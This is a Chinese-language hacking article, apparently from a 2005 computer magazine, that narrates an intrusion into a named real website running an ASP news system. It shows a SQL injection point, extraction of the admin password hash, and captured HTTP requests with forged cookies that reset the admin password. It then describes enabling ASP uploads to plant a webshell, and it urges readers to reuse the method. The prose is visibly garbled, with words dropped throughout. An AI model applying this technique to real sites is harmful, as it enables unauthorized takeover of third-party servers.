文章已经发表在电脑报2005年第8期 总第677期 转载请介绍说明！

作者:ABEND@XUST
(空虚浪子心)
---------------------------------------------------------------------------------------------
很多大侠都是通过查看源代码发现漏洞但是由于我才刚开始学ASP所以还没有达到这种境界虽然搜索漏洞不方便但偏偏些就让被我找出来点东西

自从以前看了个"动网upfile漏洞利用动画"我对抓包修改有了初步了解当时就感觉用途不只是上传那么简单于是爱死了WinSock Expert经常有事没事拿着他分析下提交数据包往往在不经意间有很大收获最近就用它发现了几个安全漏洞

图1是笔者以前侵入过个站点据说那次事件过后该网已经开始重视Web安全了这次我抱着帮他检测漏洞心态瞧瞧能不能再侵入并放个页面上去

该网站WebSite使用是沸腾3AS流浪尘缘新闻系统(核心:尘缘雅境图文系统)V0.45 ACCESS版build 1





大家都知道尘缘雅境有个漏洞Uploadfaceok.asp可以上传ASP木马管理员似乎知道这里有问题默认数据库地址也不在

转来转去感觉这个站点有点让人摸不着头脑了就好像有人故意在留后门样这个版本尘缘新闻系统本来不应该存在漏洞但是在浏览信息时候却发现他用是ReadNews1.asp 这个文件并没有用

原来ReadNews.asp很奇怪随手输入个'竟然存在注入漏洞明显没有过滤http://lovefree.org/wenzhang/wenzhang/ReadNews1.asp?NewsID=173是个注入点[Y2] (图2)





但是将文件名改为reads.asp?sid=173却被过滤了而站点首页又显示是reads1.asp很可能是管理员修改过文件什么地方由于不懂注入漏洞所以看不出来那段防止注入代码含义最后不小心把原来用来防止注入部分取掉了就是说尘缘雅境系统本来不存在这个注入点现在却被无意中制造了个注入的后得到密码也就是数据库中密码值是MD5加密过这个"地球人都知道"

MD5破解不开我就想到了WinSock Expert抓包修改我记得尘缘雅境这个在后台管理员修改密码时候并没有让输入原始密码而默认密码框中是原始密码MD5值就是说如果你修改密码会提交新密码但是需要验证旧密码MD5值现在既然拿到了MD5值就可以修改密码了还有点要注意是抓报时候要看清楚包内容看看它除了要验证旧密码MD5值以外还会验证什么

那么还是下载这个版本看看后台有什么经过修改可以拿webshell在本机上打开iis服务访问化后台页面后台有个管理员修改密码地方我猜想如果在修改后台密码时候如果使用cookies验证方式那么我们就可以直接提交相映数据包如果包中内容符合要求就会认为合法则执行修改管理员密码代码下面是我在修改密码时候抓数据包(图3)





主要是想看看修改密码都需要什么信息需要包中符合哪些内容我在本机上iis服务器ip为192.168.32.21下面是包内容:

---------------------------------------------------------------------------------------

Cookie: ASPSESSIONIDQSTCRBQS=IGCLHDBBPLKKLEAAPKGHCLPH; reglevel=; fullname=%D0%A1%B7%D1; purview=99999; KEY=super; UserName=base; Passwd=279d34fa1dfd71aa



username=base&passwd=22222&passwd2=22222&fullname=%D0%A1%B7%D1&depid=8&oskey=super&shenhe=1&cmdok=+%D0%DE+%B8%C4+

-------------------------------------------------------------------------------------

下面就是需要验证Cookie内容

Cookie: ASPSESSIONIDQSTCRBQS=IGCLHDBBPLKKLEAAPKGHCLPH; reglevel=; fullname=%D0%A1%B7%D1; purview=99999; KEY=super; UserName=base; Passwd=279d34fa1dfd71aa

这些是需要信息不需要都看懂只要知道有usernamePasswdpurviewKEYfullname这个几个值需要验证就是让他们符合要求再看看数据库它们都在admin表下也就是说我现在可以通过注入弄到它们purview=99999KEY=super这两个是介绍说明其为超级管理员不变最重要就是剩下 3个值

Username=admin, Passwd= 24a2b13f36f9f99c, fullname=doudou(都是通过nbsi工具注入得到值)[Y4] 我们就用这些来欺骗现在包对应值有了包内容如果现在提交就会出现修改成功这样会把我本机尘缘雅静密码改掉要改可是他啊怎样做到最简便呢？我们知道包内容里面有被修改ip地址当然也可以改可是改了以后还要计算并修改包大小值这样子很麻烦还不如我们不修改包了就先欺骗自己机子让自己以为自己所架设服务器ip地址就是域名lovefree.org然后抓包再让自己机子认为lovefree.org又指向原来地方那么我们就不用再改动包内容了做法很简单

要做是让我自己电脑认为站点_blank>http://lovefree.org/wenzhang/wenzhang/在我ip上而且对应得路径就是我安装尘缘雅静化地址改E:\WINDOWS\system32\drivers\etc\下hosts文件加行:

192.168.32.21 lovefree.org(图4)





然后设置iis服务器加上个虚拟目录wenzhang/wenzhang指向尘缘雅境在自己机子上目录好了现在在浏览器上输入http://lovefree.org/wenzhang/wenzhang就是我机子上尘缘雅境了(图5)





这样目是抓到包等下可以直接提交给真实服务器样(可以在后台改fullname是管理员全名)" target=http://lovefree.org/wenzhang/wenzhang地址不需要修改包大小而为了保证大小样在我们机子上username=admin,fullname=doudou也设置和远程服务器样(可以在后台改fullname是管理员全名)

切就绪现在开始再抓次修改密码包为了方便起见我已经把管理员信息改为username=admin,fullname=doudou了剩下包里需要修改信息就是md5密码值md5加密后都是16位不影响包大小

---------------------------------------------------------------------------------------

POST /admin/saveedit.asp?id=1 HTTP/1.1

Accept: image/g, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpo,


application/msword, application/x-shockwave-flash, */*

Referer: _blank>http://www.xijing.com.cn/admin/useredit.asp?id=1

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)

Host: www.xijing.com.cn

Content-Length: 110

Connection: Keep-Alive

Cache-Control: no-cache

(下面是coocike验证内容)

Cookie: NB796459377Vote1=1; ASPSESSIONIDQSTCRBQS=MGCLHDBBGDELLJGJGJHGKBML; reglevel=; fullname=doudou; KEY=super; UserName=admin; purview=99999; Passwd=24a2b13f36f9f99c

(下面是修改信息)

username=admin&passwd=abend&passwd2=abend&fullname=doudou&depid=10&oskey=super&shenhe=1&cmdok=+%D0%DE+%B8%C4+

---------------------------------------------------------------------------------------

看到了包和真样！简直就像从他服务器上抓来这样我们要改就只有passwdmd5值了就是说只要这个也匹配真正lovefree.org服务器就会认可改为24a2b13f36f9f99c就是注入得到密码md5值现在把host文件内容改回来改回来的后再输入域名lovefree.org就是打开真实地址了用nc提交(图6)





哈哈！恭喜您!您资料已经修改成功! 2秒钟后返回上页!

现在密码就是abend用它来登录后台到网站WebSite属性改"上传文件类型:"多加个asp就可以上传asp木马

就针对尘缘雅境来说虽然大家可能没我那么幸运刚好有个reads1.asp文件没加过滤但是如果不小心拿到了数据库也不至于看着md5发愁了吧？其实还有很多都存在这样问题如果你拿到了某站管理员md5值不妨用这种思路方法试下也许有很大收获！

上篇文章: 用vbs来写sql注入等80端口攻击脚本

下篇文章: 溢出利用和编程语言大杂烩